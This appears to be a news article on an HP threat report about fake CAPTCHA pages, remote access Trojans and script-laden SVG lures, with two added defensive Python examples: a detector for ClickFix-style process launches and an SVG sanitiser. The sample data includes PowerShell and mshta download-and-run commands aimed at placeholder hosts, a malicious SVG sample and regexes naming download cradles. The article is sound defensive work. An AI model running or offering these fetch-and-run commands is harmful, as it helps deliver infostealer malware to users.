- HP Wolf Security Threat Insights report reveals new malware campaigns
- Victims have their data exfiltrated by a remote access Trojan
- Attackers have been observed using fake CAPTCHA verification pages
New research has found that victims are increasingly being infected with malware through a rise in fake CAPTCHA verification tests, which exploit a growing 'click tolerance': users have become accustomed to 'jumping through hoops' to authenticate online.
This is not the first report to flag the technique: security researchers identified fake CAPTCHA pages spreading infostealer malware at the end of 2024, but the latest HP threat report warns that the activity is growing.
Users are typically directed to attacker-controlled websites and then pressured into completing convincing but fake authentication challenges.
More campaigns identified
These fake CAPTCHAs typically trick users into running malicious PowerShell commands on their own device, which install Lumma Stealer, a popular infostealer capable of exfiltrating a wide range of sensitive information, including browser data, email credentials, customer data and even cryptocurrency wallets. Because the victim pastes and runs the command themselves, no browser vulnerability is exploited: the payload executes outside the browser sandbox with the user's own privileges, so the first detection opportunity is usually the process-creation event rather than anything in the web session.
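The chain above (a user pastes an attacker-supplied command into the Run dialog or a terminal, an interpreter launches under explorer.exe with a hidden window and a download cradle) leaves a recognisable footprint in process-creation telemetry. The following is an added example, not code from HP's report or from any named vendor, showing how to score Sysmon Event ID 1-style records for that pattern. The event records, domains (reserved `.invalid` names), scoring weights and the `THRESHOLD` value are all constructed assumptions for illustration; tune them against your own baseline.

```python
"""Flag ClickFix-style fake-CAPTCHA executions in process-creation telemetry.

Added example (not HP's code). SAMPLE_EVENTS are constructed in a Sysmon
Event ID 1 shape; the weights and THRESHOLD are illustrative assumptions."""
import base64
import binascii
import re

# Interpreters a fake-CAPTCHA page tells the victim to paste a command into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:in(?:dowstyle)?)?\s+h(?:id(?:den)?)?\b")
ENCODED_CMD = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
POLICY_BYPASS = re.compile(r"(?i)(?:^|\s)-e(?:p|xecutionpolicy)\s+bypass\b")
CRADLE = re.compile(r"(?i)\b(?:iex|invoke-expression|iwr|invoke-webrequest|irm|"
                    r"invoke-restmethod|downloadstring|downloadfile|net\.webclient|"
                    r"start-bitstransfer|curl)\b")
URL = re.compile(r"(?i)\bhttps?://\S+")
THRESHOLD = 4  # assumed cut-off; raise it if explorer.exe-spawned shells are common in your fleet

# Constructed sample: event 4 carries a -enc payload built here so the base64 is valid.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/p')"
    .encode("utf-16-le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    {"id": 1, "image": _PS, "parent": _EXPLORER,
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr http://verify.example.invalid/a -UseBasicParsing)"'},
    {"id": 2, "image": r"C:\Windows\System32\mshta.exe", "parent": _EXPLORER,
     "cmdline": "mshta http://captcha.example.invalid/verify.hta"},
    {"id": 3, "image": _PS, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -File C:\\scripts\\nightly-backup.ps1"},   # benign scheduled job
    {"id": 4, "image": _PS, "parent": _EXPLORER,
     "cmdline": "powershell -enc " + _ENCODED},
    {"id": 5, "image": _PS, "parent": _EXPLORER,
     "cmdline": "powershell -NoProfile -Command Get-Process"},            # benign interactive use
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_event(ev):
    """Score one process-creation event; returns (score, list of reasons)."""
    image, parent = basename(ev["image"]), basename(ev["parent"])
    cmd = ev["cmdline"]
    hits = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.append((2, "encoded command, decodes to: " + decoded.strip()))
        cmd += " " + decoded  # run the remaining checks on the decoded text as well
    if parent == "explorer.exe" and image in INTERPRETERS:
        hits.append((1, f"{image} spawned by explorer.exe (Win+R / Run dialog)"))
    if HIDDEN_WINDOW.search(cmd):
        hits.append((2, "hidden window requested"))
    if POLICY_BYPASS.search(cmd):
        hits.append((1, "execution policy bypass"))
    has_cradle, has_url = bool(CRADLE.search(cmd)), bool(URL.search(cmd))
    if has_cradle and has_url:
        hits.append((3, "download cradle with remote URL"))
    elif has_cradle or has_url:
        hits.append((1, "download cradle or URL on command line"))
    if image == "mshta.exe" and has_url:
        hits.append((3, "mshta.exe fetching a remote HTA"))
    return sum(w for w, _ in hits), [r for _, r in hits]


def flag_events(events, threshold=THRESHOLD):
    """Return {event id: (score, reasons)} for events scoring at or above threshold."""
    flagged = {}
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged[ev["id"]] = (score, reasons)
    return flagged


if __name__ == "__main__":
    for eid, (score, reasons) in flag_events(SAMPLE_EVENTS).items():
        print(f"event {eid}: score {score}")
        for r in reasons:
            print("   -", r)
```

The decoded `-enc` payload is folded back into the command line before the other checks run, so a cradle hidden behind base64 still counts. Events 3 and 5 stay below the threshold: a scheduled `-File` job from cmd.exe and an interactive `Get-Process` from explorer.exe each earn at most one point.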
The fake CAPTCHA campaign was not the only threat uncovered. Attackers were also seen gaining access to end users' webcams and microphones following social-engineering attacks, mainly using open-source remote access Trojans such as XenoRAT to control devices, exfiltrate data and log keystrokes.
Alongside this, attackers were observed delivering malicious JavaScript code "inside scalable vector graphics (SVG) images to evade detection." These images open "by default" in browsers, and the embedded code executes, "offering opportunities for redundancy and monetisation for the attacker" through the remote access tools. The point to note is that script inside an SVG only runs when the file is opened directly in the browser (for example, a downloaded attachment); an SVG loaded through an HTML img element does not execute script, which is why the lure depends on getting the user to open the file itself.
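SVG is XML, so the active content that makes this technique work (script elements, `on*` event-handler attributes, `javascript:` links, and foreignObject wrappers that can carry HTML) can be enumerated and stripped before a file is opened or forwarded. The block below is an added example, not code from HP's report, showing a detector and a sanitiser for that active content. Both SVG documents are constructed samples; the redirect target uses a reserved `.invalid` name. It uses the standard-library parser for portability; in production, parse with `defusedxml` to avoid entity-expansion attacks, which is an assumption about your deployment, not something the article discusses.

```python
"""Detect and strip active content in SVG files (added example, not HP's code).

Finds <script>/<foreignObject>/embedding elements, on* event handlers and
javascript:/vbscript:/data: URLs, and can remove them. Sample SVGs are constructed."""
import re
import xml.etree.ElementTree as ET   # swap for defusedxml in production (assumption)

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # keep the serialised output free of ns0: prefixes
ET.register_namespace("xlink", XLINK_NS)

ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
URL_ATTRS = {"href", "src", "data"}      # matched on the local name, so xlink:href is covered
DANGEROUS_SCHEME = re.compile(r"^\s*(?:javascript|vbscript|data)\s*:", re.I)

# Constructed samples: one plain icon, one lure in the style described in the article.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <circle cx="50" cy="50" r="40" fill="#0a0"/>
</svg>"""
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">
  <script><![CDATA[ window.location = "https://verify.example.invalid/"; ]]></script>
  <a xlink:href="javascript:void(0)"><text x="10" y="20">Click to verify</text></a>
  <rect width="100" height="100"/>
</svg>"""


def local(qname):
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return qname.rsplit("}", 1)[-1]


def find_active_content(svg_bytes):
    """Return a list of human-readable findings; an empty list means nothing active was found."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # Browsers are lenient and may still render a file our parser rejects,
        # so a parse failure is itself a reason to quarantine.
        return [f"unparseable XML ({exc}); treat as suspicious"]
    findings = []
    for el in root.iter():
        name = local(el.tag)
        if name in ACTIVE_TAGS:
            findings.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            aname = local(attr)
            if aname.lower().startswith("on"):
                findings.append(f"event handler {aname} on <{name}>")
            elif aname in URL_ATTRS and DANGEROUS_SCHEME.match(value):
                scheme = value.split(":", 1)[0].strip().lower()
                findings.append(f"{aname} with {scheme}: scheme on <{name}>")
    return findings


def strip_active_content(svg_bytes):
    """Return the SVG with active elements and attributes removed (raises on unparseable input)."""
    root = ET.fromstring(svg_bytes)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):
        if local(el.tag) in ACTIVE_TAGS and el in parent_of:
            parent_of[el].remove(el)
    for el in root.iter():
        for attr in list(el.attrib):
            aname = local(attr)
            if aname.lower().startswith("on") or (
                    aname in URL_ATTRS and DANGEROUS_SCHEME.match(el.attrib[attr])):
                del el.attrib[attr]
    return ET.tostring(root, encoding="utf-8")


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        print(label, find_active_content(doc) or "clean")
    print(strip_active_content(MALICIOUS_SVG).decode())
```

The sanitiser is deliberately destructive rather than clever: it deletes whole elements instead of trying to neutralise script text, because a CDATA block, an entity or an unusual namespace prefix can all hide the same payload from a text-based rule.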
"A common thread in these campaigns is the use of obfuscation and anti-analysis techniques to slow down investigation," said Patrick Schläpfer, principal threat researcher at HP Security Lab.
"Even simple but effective defence evasion techniques can delay the detection and response of security operations teams, making it harder to contain an intrusion. By using methods such as direct system calls, attackers make it more difficult for security tools to catch malicious activity, giving them more time to operate undetected and compromise victims' endpoints."